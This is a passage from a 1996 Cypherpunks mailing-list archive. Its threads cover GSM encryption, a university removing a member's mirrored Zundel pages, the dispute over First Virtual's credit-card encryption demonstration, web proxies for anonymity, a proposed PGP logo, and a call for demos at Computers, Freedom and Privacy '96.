- Are there notable instances where GSM deployment was delayed or
halted due to A5? (I remember hearing that such a delay happened in
Australia, but I don't recall details.)

Any related information, or pointers to related information,
appreciated greatly.

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 3 Feb 1996 05:05:51 +0800
To: cypherpunks@toad.com
Subject: Futplex makes the news!
Message-ID: <v02120d00ad381ed3c908@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I just heard on WBUR (NPR) here in Boston that our own L. (I know his real
first name now...) "Futplex" McCarthy was busted by the UMASS diginarks for
putting "Nazi material" on the internet. This must be one of those
Nazi-mirrors I've been skipping articles over...

They were pretty hysterical, NPR. Maybe we should call him "FUDplex" in
honor of his newfound notariety...

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Sat, 3 Feb 1996 09:08:25 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Denning's misleading statements
In-Reply-To: <199602010308.WAA27249@pipe2.nyc.pipeline.com>
Message-ID: <199602022316.PAA12911@well.com>
MIME-Version: 1.0
Content-Type: text


> Responding to msg by jonl@well.com (Jon Lebkowsky) on Wed, 31 
> Jan  6:34 PM
> 
> 
> >Definitely! I wonder who we could get from the FBI??
> 
> 
>    Try for Al Bayse, formerly assistant director of the FBI's
>    Technical Services Division and its long-time senior
>    techonology expert. Here's a quote from David Burnham's new
>    book, "Above the Law:"
> 
>       Al Bayse, whom FBI documents suggest has been involved
>       in the Clipper since its inception, was ecstatic about
>       its inception. Shortly before the White House announced
>       the project to reporters, he telephoned the three
>       leading security experts in the academic world --
>       Dorothy Denning of Georgetown University, Lance Hoffman
>       of George Washington University and Peter Neumann of SRI
>       International -- and informed them that the FBI's
>       problem had been solved. (p. 150)
> 
>    Burnham claims that because Bayse shaped and directed the
>    FBI's investigative technologies from the late 1970s to the
>    mid-1990s he "may well be the nation's single most
>    influential law enforcement official since J. Edgar
>    Hoover." (p. 136)

Is he online? I need his email address, and Denning's.

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                 http://www.well.com/~jonl
Host, Electronic Frontiers Forum, 7PM PST 9PM CST Thursdays
  at Club Wired <http://www.hotwired.com/club>
Vice President, EFF-Austin <http://www.io.com/~efaustin>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 08:02:50 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <ad37cb251902100476f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 PM 2/2/96, Richard Martin wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F033%2Fre
>g%2Fag052102
>
>Is an AP report on the at-home censorship.

Many thanks for providing this, Richard! I just read it, and it worries me.

If UMass has yielded, the prominently mentioned CMU and Stanford sites may
be prompted to exactly the same thing. This will "prove" to the Germans
that they did the right thing, and be a blow in _favor_ of suppression of
speech.

I hope some other sites have the mirrored material and are not reeds in the
wind as at least one university is.

(Did I hear correctly that Futplex has "volunteered" to perform 500 hours
of community service at the Simon Wiesenthal Center's Boston office? And
that he has volunteered to attend 50 hours of sensitivity training? Or am
thinking of Cornell?)

Not to make light of this sorry episode, you understand. But my guess is
that unless Futplex immediately begins to grovel to the campus bigshots and
explain how his judgment was impaired by exposure to fascist Cypherpunks,
that his days at UMass as a grad student are numbered. This is the way
universities seem to handle these things.

--Tim, who hopes he's wrong....

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Sat, 3 Feb 1996 05:30:37 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Active processes monitoring?
In-Reply-To: <9602021919.AA08293@cti02.citenet.net>
Message-ID: <Pine.A32.3.91.960202153745.207004K-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Feb 1996, Jean-Francois Avon wrote:

> AFAIK, when I do mem /c in a dos windows, under W3.11wg, it seems to report
> all processes that I expect that would be running in the machine.
> 
> It reports win something processes,
> it reports realdeal, cd-rom drivers and everything (I think...)

No wizard I, but I think that it is showing you all programs (TSRs, drivers,
etc) loaded _before_ Windows. I do not see it showing programs loaded in
other Dos windows. (Edit, XyWrite, dBase, MSD, etc.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul M. Cardon" <pmarc@fnbc.com>
Date: Sat, 3 Feb 1996 07:40:21 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <199602022142.PAA10232@abraxas.fnbc.com>
MIME-Version: 1.0
Content-Type: text/plain


My mailer insists that Nathaniel Borenstein wrote:
> I know people are tired of hearing from me, but I can't let *this*
> go unchallenged:
>
> Excerpts from mail.cypherpunks: 30-Jan-96 Re: FV Demonstrates Fatal
> F.. "Paul M. Cardon"@fnbc.co (580*)
>
> > Interesting address that was used to reach me.
>
> > To: pmarc@nsb.fv.com To: pmarc
>
> > Somehow, both reached me from within their system, but if they
> > can't configure their e-mail to show the proper address than I
> > don't have to much faith in their other abilities. I don't
> > imagine that anybody else would have much luck replying to either
> > of those or CAN I now receive mail at nsb.fv.com? Is this a new
> > free service provided by FV?
>
> Bogus mail addresses of that kind are typically added by all sorts
> of mail relays. In other words, although I can't tell you 100% for
> certain without seeing the mail headers, the scenario underlying
> this was probably something involving a bogus mail relay.
> Alternately, there are some systems where this could have all
> happened entirely on your end, in your delivery software. There are
> a zillion ways this can happen, actually. I've checked my archive,
> and that address definitely was not in the mail when it left my
> system.

You like that zillion word when you can't quantify something.

> I can guarantee you that it wasn't our system that did this. If
> there's one things we know cold, it's email.

C'mon Nathan.  It was in the Received headers generated at your  
end.  I agree that it COULD have happened on our end, but it didn't.  
 I've never seen anybody with such an arrogant attitude.  BTW, it  
looks like it has been fixed now.  :-b

---
Paul M. Cardon

MD5 (/dev/null) = d41d8cd98f00b204e9800998ecf8427e




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bjohnson@nym.alias.net
Date: Sat, 3 Feb 1996 07:40:16 +0800
To: cypherpunks@toad.com
Subject: Proxies
Message-ID: <199602022146.PAA10881@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


I keep hearing references to 'proxies' as a method of anonymity.  The only information that I've been able to find, deals with firewalls on networked systems.

Are 'proxies' applicable to personal PCs using browsers, such as Netscape?

Would appreciate any info or leads to information sources.

Thanks in advance,
bjohnson@nym.alias.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Sat, 3 Feb 1996 05:55:43 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
In-Reply-To: <v02120d00ad381ed3c908@[199.0.65.105]>
Message-ID: <9602021547.ZM22167@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F033%2Freg%2Fag052102

Is an AP report on the at-home censorship.

richard

- --
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRJ4AR1gtCYLvIJ1AQFIrgQAnYnAAG0b+PU5IGUxBYI6ufcNzaaR4y5v
bsd7FS1uUSnATWuEXPEPgx1rtRRLgzIID5JoDMK9tcOAjIVts0OdJMMVE+ZVux4E
b+FijVRRaoelyOgbyPHUzr1E2e2oEhbNV8fKfAiaivaKR32FXDHxIJnHghRYlLDZ
M0keLCHcMTc=
=YCtp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 3 Feb 1996 06:18:26 +0800
To: cypherpunks@toad.com
Subject: cypherpunks press
Message-ID: <ad37e33d0002100422e4@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


The 29 January New Yorker has an article "Hackworm" that discusses the
Mitnick-Shimomura-Markoff echoing cypherpunks lack of sympathy for the
Markoff-Shimomura P.R. extravaganza.  Article ends mentioning cypherpunks
and John Gilmore specifically, discussion of crypto politics, while not
entirely toe-ing the cypherpunks party line, an enhearteningly informed and
rational treatement.

[An altavista search reveals the New Yorker is at
http://www.enews.com/magazines/new_yorker/, but they don't seem to put the
entire issue online, and parts of the 15 January issue is what you get when
you click on "current issue"]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <Jeremym@area1s220.residence.gatech.edu>
Date: Sat, 3 Feb 1996 06:26:29 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: Active processes monitoring?
Message-ID: <2.2.32.19960202210108.00ec2df4@area1s220.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:59 PM 2/2/96 -0500, you wrote:
>
>> Are there others applications like MEM that are not as universal?
>> (here, I guess that such stealth behaviour have to rely on identifying the
>> program being loaded, thus, a less common program has less chance of 
>> being fooled)
>
>Mem /C doesn't do squat under 95... don't know about 3.11.... since each 
>DOS box runs in its own space, MEM /C cannot see what processes are 
>running in Windoze.

There are a number of process viewing applications available for Win95/NT.
I use two of them: one is called pstat.exe and the other is ps.exe.  Both of
them
show most of the visible processes running.  ps does not show running services,
but pstat does.  Both of them are available at

ftp://csa.gt.ed.net


Jeremy
---
   Jeremy Mineweaser     | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
 j.mineweaser@ieee.org   | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 3 Feb 1996 06:58:56 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: cypherpunks press
In-Reply-To: <ad37e33d0002100422e4@[132.162.233.188]>
Message-ID: <199602022111.QAA12320@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Rochkind writes:
> The 29 January New Yorker has an article "Hackworm" that discusses the
> Mitnick-Shimomura-Markoff echoing cypherpunks lack of sympathy for the
> Markoff-Shimomura P.R. extravaganza.  Article ends mentioning cypherpunks
> and John Gilmore specifically, discussion of crypto politics, while not
> entirely toe-ing the cypherpunks party line, an enhearteningly informed and
> rational treatement.

Could someone please explain to me why Mitnick is a cypherpunk issue?
Myself, I have neither sympathy nor lack of sympathy for the
Markoff-Shimomura "pr extravaganza", see no "cypherpunk" opinion on
the subject, and don't see any reason we should, as a group, discuss
or care about the topic.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 08:36:51 +0800
To: cypherpunks@toad.com
Subject: Re: PGP "official" logo?
Message-ID: <ad37d3601a021004660a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 2/2/96, jf_avon@citenet.net (Jean-Francois Avon (JFA
Technologies, QC, wrote:

>Me too...
>
>Some ideas:
>
> - ask Phil Z. if he ever devised a PGP logo.
> - a PGP logo design contest (the prize would be eternal glory
>      and gratitude from all CPunks)
>     In this latter case, the winner might be decided by:
>          - a jury (presided by Phil Z. ?)
>          - a vote of CPunks

I realize that Phil Z. is an "icon" to many people, but icons sometimes are
overrated. In this context, I mean symbolic icons, or logos, e.g., little
pictures.

Why is an icon or logo preferable to "Begin PGP signed..."? The little
rose, or chevrons, or escutcheons, or whatever, then have to be explained
to people. "PGP" is actually its own best logo.

(There is also the important point that most uses of PGP are in
primarily-ASCII settings, in e-mail. Yes, I know that MIME and whatnot can
support graphics, but such uses are rare. Look at this mailing list, and
Usenet, for examples of how most messages are composed. I routinely delete
all messages that have "attachments converted" to them, and others have
told me they do the same thing.)

Logos and signs typically are useful to attract customers from afar, as
with roadside signs, or to establish consumer preference. In the case of
PGP, neither situation seems especially germane.

Finally, the idea of a "contest" and a "vote" comes up once again. Being an
anarchy, no one is stopping anyone from attaching logos to their articles.
But I can't imagine a "vote of CPunks."

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 3 Feb 1996 09:41:27 +0800
To: cypherpunks@toad.com
Subject: Re: Proxies
In-Reply-To: <ad37d66e1b0210041d95@[205.199.118.202]>
Message-ID: <m24tt9nu6i.fsf@miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Tim" == Timothy C May <tcmay@got.net> writes:

Tim> At 9:46 PM 2/2/96, bjohnson@nym.alias.net wrote:

>> I keep hearing references to 'proxies' as a method of anonymity.
>> The only information that I've been able to find, deals with
>> firewalls on networked systems.
>> 
>> Are 'proxies' applicable to personal PCs using browsers, such as
>> Netscape?

Proxies aren't any use towards anonymity on a single user system.
They can be very useful on a network, regardless of whether a firewall
exists or not.

>> Would appreciate any info or leads to information sources.

Tim> A quick look with Alta Vista for the string "web proxy" reveals
Tim> 25 articles on Usenet and 200 on the Web, with some of them
Tim> containing further pointers, definitions, and other helpful
Tim> information.

For one-stop shopping I recommend Delegate, written by Yutaka Sato
<ysato@etl.go.jp>, available from
	ftp://etlport.etl.go.jp/pub/DeleGate/

It should run on any reasonable Unix system.  Most of the
documentation is in Japanese, but there is enough in English to get it
up and running.

Regards,
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 3 Feb 1996 06:32:13 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <v02120d02ad382ec313bc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>I just heard on WBUR (NPR) here in Boston that our own L. (I know his real
>first name now...) "Futplex" McCarthy was busted by the UMASS diginarks for
>putting "Nazi material" on the internet. This must be one of those
>Nazi-mirrors I've been skipping articles over...

So, the "expanded version" of the story says that it was a nazi-mirror, and
FUDless verbage why Futplex did it, and that UMASS Amherst said they didn't
want "Political messages" on their web-server, so they booted Futplex.

LOL! The most Politically Correct university in the universe doesn't want
"Political messages" on their web server!

The ganglia twitch...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Feb 1996 08:43:08 +0800
To: cypherpunks@toad.com
Subject: Re: Proxies
Message-ID: <ad37d66e1b0210041d95@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 PM 2/2/96, bjohnson@nym.alias.net wrote:
>I keep hearing references to 'proxies' as a method of anonymity.  The only
>information that I've been able to find, deals with firewalls on networked
>systems.
>
>Are 'proxies' applicable to personal PCs using browsers, such as Netscape?
>
>Would appreciate any info or leads to information sources.

A quick look with Alta Vista for the string "web proxy" reveals 25 articles
on Usenet and 200 on the Web, with some of them containing further
pointers, definitions, and other helpful information.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 23:41:28 +0800
To: declan+@CMU.EDU
Subject: Re: Futplex makes the news!
In-Reply-To: <ad37cb251902100476f7@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.960202160907.20243N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I originally sent Tim private mail saying "you're wrong."

On the other hand, reading futplex's actual statement and the fact that
Germany continues to "investigate" CompuServe and AOL, maybe he's right... 

This is not the end, but it may be the end of the beginning.

I also think there's a place for premature ejaculations of victory, 
because they tend to become self-fulfilling prophecies. If the press says 
that Germany is successfully censoring Zundel, then that sets a 
precedent; but if the press says that Germany's limp attempts to censor 
somebody on the Internet were a total failure, then they'll just look 
like a bunch of goofballs pursuing a lost cause. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 3 Feb 1996 07:33:24 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Delusional
In-Reply-To: <9601301325.AA17030@sulphur.osf.org>
Message-ID: <gl4c2KaMc50eF5gZxr@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 30-Jan-96 Delusional Rich Salz@osf.org (752)

> You're disagreeing that I invented safe-tcl?  You disagree that I sent
> you and Ousterhout the very first message that said I want to strip out
> the dangerous commands?

That's not the way I remember it at all, but I'd be interested in seeing
the archives.  My recollection was that it was invented over breakfast
at an IETF meeting (the Columbus one???  I'm not sure) and that Dave
Crocker and Einar Stefferud were also there, along with Marshall and I. 
If I'm misremembering, I apologize.  Honeslty.  

> You're disagreeing that without enabled mail FV would probably
> not have happened?

Except for the fact that they provided prior evidence that Marshall & I
could work together, I'm not sure how it's relevant.  Yes, we used
safe-tcl to implement our server, but any number of other languages
would have sufficed.... -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 3 Feb 1996 07:49:01 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks press
Message-ID: <ad37e85f03021004579c@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


>Jonathan Rochkind writes:
>> The 29 January New Yorker has an article "Hackworm" that discusses the
>> Mitnick-Shimomura-Markoff echoing cypherpunks lack of sympathy for the
>> Markoff-Shimomura P.R. extravaganza.  Article ends mentioning cypherpunks
>> and John Gilmore specifically, discussion of crypto politics, while not
>> entirely toe-ing the cypherpunks party line, an enhearteningly informed and
>> rational treatement.
>
>Could someone please explain to me why Mitnick is a cypherpunk issue?
>Myself, I have neither sympathy nor lack of sympathy for the
>Markoff-Shimomura "pr extravaganza", see no "cypherpunk" opinion on
>the subject, and don't see any reason we should, as a group, discuss
>or care about the topic.
>
>Perry

The article mentions the cypherpunks, and spends a couple pages discusing
crypto politics and internet security issues.  Like I said, I found it an
unusually well-informed article for the conventional press.  I thought
other cypherpunks list members would be interested in a pointer to it, both
because it discusses the cypherpunks list and because it discusses crypto
politics in a fairly intelligent manner.  And, yes, because it was also
about Mitnick-Markoff-Shimomura, and despite your constant protests that it
isn't a cypherpunks issue, I know that many on the list disagree and are
interested in the issue (and have opinions about it, individually; of
course there is no group mind 'cypherpunks opinion'.)  And, also, because I
think media analysis and issues of what the media is doing and how it works
are 'cypherpunks issues'--that is, issues with a direct relationship to the
crypto issues often discussed here, and which a large proportion of list
members are interested in discussing and hearing about.

I don't see why you, Perry, are the arbiter of what is and is not a
'cypherpunk issue'--if there are lots of people interested in discussing a
certain issue or type of issue on the list, it's going to be discussed.
All you can do is increase the noise on the list even futher by constantly
complaining about it.   Which you seem to enjoy, so go ahead, I guess.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 3 Feb 1996 06:57:15 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Futplex makes the news!
In-Reply-To: <v02120d02ad382ec313bc@[199.0.65.105]>
Message-ID: <199602022124.QAA03337@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bob Hettinga writes:
> So, the "expanded version" of the story says that it was a nazi-mirror, and
> FUDless verbage why Futplex did it, and that UMASS Amherst said they didn't
> want "Political messages" on their web-server, so they booted Futplex.

Just to be clear, I haven't been expelled or suspended from the school, and
I have not been notified of any kind of pending disciplinary action against
me. The pages are indeed gone, however.

Lewis "Futplex" McCarthy, checking in from Rumor Control Central

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRKA3Gf7YYibNzjpAQHiqQQAy//2FTjwOuJ9OT8Dpo9dH69GfbSmPadA
1WpFjFG6m05R0aAF5NFCKkmLRGXM4/pj2ZOSqB4ghfaBnd5GSviNWlWajOYFUYuk
q//INed6U1c7Es3SCNEJN0QeY8hDnZwtjUfsSwWlH8SnrY5PD9S0jj4H6kCoNCnQ
LVb6h2H+biQ=
=ILCO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 3 Feb 1996 08:21:27 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Subject: Re: PGP "official" logo? (a.k.a. the Return of the Logo Wars)
In-Reply-To: <9602022143.AA16479@cti02.citenet.net>
Message-ID: <9602022227.AA01627@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


JF Avon (jf_avon@citenet.net), in a fit of creativity, writes:
> Some ideas:
>
>  - ask Phil Z. if he ever devised a PGP logo.
>  - a PGP logo design contest (the prize would be eternal glory
>       and gratitude from all CPunks)
>      In this latter case, the winner might be decided by:
>           - a jury (presided by Phil Z. ?)
>           - a vote of CPunks

If you consult the archives you will find the decayed remains of many  
cypherpunks whose blood was shed in the "Logo Wars" of years past.

Instead of having another logo war on the mailing list and having to shout  
over the din of accounts and subjects hitting the bottom of subscriber's kill  
files, I'll sum it up for you:  If you have a cool logo, put it on your own web  
pages (or get someone to put it on theirs).  Then post the URL on the mailing  
list.  If others like it they will use it.  Welcome to anarchy.

Forget contests (unless you want to pony up the prizes and the judges), forget  
voting, forget juries presided by PRZ (he has more important things to do...),  
forget trying to get a consensus on the mailing list...  Still, if you feel  
you must select a logo in public, set up your own mailing list for discussing  
the logo...

> I think it would not do any good if everybody used their own logo.

I doubt that there will be a large number of logos produced (if any...).  If  
one person comes up with a logo that is obviously better than all the rest then  
people will use it.  If nobody puts logos on their pages then it probably  
wasn't meant to be.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 3 Feb 1996 07:07:14 +0800
To: pmarc@fnbc.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <sl4c9n6Mc50eJ5gbYU@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


I know people are tired of hearing from me, but I can't let *this* go
unchallenged:

Excerpts from mail.cypherpunks: 30-Jan-96 Re: FV Demonstrates Fatal F..
"Paul M. Cardon"@fnbc.co (580*)

> Interesting address that was used to reach me.

> To: pmarc@nsb.fv.com
> To: pmarc

> Somehow, both reached me from within their system, but if they  
> can't configure their e-mail to show the proper address than I don't  
> have to much faith in their other abilities.  I don't imagine that  
> anybody else would have much luck replying to either of those or CAN  
> I now receive mail at nsb.fv.com?  Is this a new free service  
> provided by FV?

Bogus mail addresses of that kind are typically added by all sorts of
mail relays.  In other words, although I can't tell you 100% for certain
without seeing the mail headers, the scenario underlying this was
probably something involving a bogus mail relay.  Alternately, there are
some systems where this could have all happened entirely on your end, in
your delivery software.  There are a zillion ways this can happen,
actually.  I've checked my archive, and that address definitely was not
in the mail when it left my system.

I can guarantee you that it wasn't our system that did this.  If there's
one things we know cold, it's email.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 3 Feb 1996 07:17:56 +0800
To: weld@l0pht.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.BSD/.3.91.960130094017.9580A-100000@l0pht.com>
Message-ID: <Il4cDhyMc50eR5gdEN@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 30-Jan-96 Re: FV Demonstrates Fatal F..
Weld Pond@l0pht.com (1503*)

> Here is an example of an imagemap for secure number entry.

> http://www.l0pht.com/~weld/numbers.html

I *really* like this example.  That's because it demonstrates so clearly
the security/usability tradeoff that I keep trying to hammer home to
people.

Yes, with something like this -- and a LOT of variation, so it wasn't
the same every time -- you could avoid an attack like ours.  But you'd
also have a user interface that was virtually unusable.  The focus of
the attack we outlined was one particular, naive approach to Internet
commerce that sacrificed a lot of security for usability.  If the net
result of what we've done is to force them to find a better balance, it
was well worth the effort.

Or, to put it another way, I'm not too worried about competing with
software-encrypted credit card numbers if they use an imagemap technique
like the one you've outlined.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 3 Feb 1996 07:25:18 +0800
To: cypherpunks@toad.com
Subject: PGP "official" logo?
Message-ID: <9602022143.AA16479@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 2 Feb 1996, somebody wrote

>> Just put a "PGP signed" logo <snip>
>> This would also have the bonus effect of making PGP more
>> visible to the web-browsing public.  I'll work on this
>> during my.. err.. "spare time".

and somebody replied:

>Yeah, I like the idea of a standardized logo. A lot.

Me too...

Some ideas:

 - ask Phil Z. if he ever devised a PGP logo.
 - a PGP logo design contest (the prize would be eternal glory
      and gratitude from all CPunks)
     In this latter case, the winner might be decided by:
          - a jury (presided by Phil Z. ?)
          - a vote of CPunks

I think it would not do any good if everybody used their own logo.

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Leonard N. Foner" <foner@media.mit.edu>
Date: Sat, 3 Feb 1996 07:21:16 +0800
To: cypherpunks@toad.com
Subject: Call for Demos at Computers, Freedom, and Privacy '96
Message-ID: <9602022139.AA20052@out-of-band.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Since 1991, the Computers, Freedom, and Privacy conference has brought
together experts and advocates from the fields of computer science, law,
business, public policy, law enforcement, government, and many other areas
to explore how computer and telecommunications technologies are affecting
freedom and privacy.

This year, for the first time, it's happening at MIT.  I'm helping to
coordinate a Technology Fair of interesting demos related to CFP's themes,
and I'm soliciting people for neat things they'd like to show.

If you think you have something you'd like to demo, please let me know.
For more information about the conference, you might want to check out
  http://www-swiss.ai.mit.edu/~switz/cfp96/
and for information about the demos themselves (including telling us what
items you may need us to provide), you should check out
  http://www-swiss.ai.mit.edu/~switz/cfp96/call-for-demos.html

Some examples to get you thinking:
. A demonstration of anonymous remailers?
. A demonstration of NFS packet substitution on the wire?
. Real-time Netscape key-breaking?
. A bake-off between some individuals or companies to see who can find out
  the most dirt on someone the fastest?
. Something else?

Remember, a lot of the things that Cypherpunks take for granted are
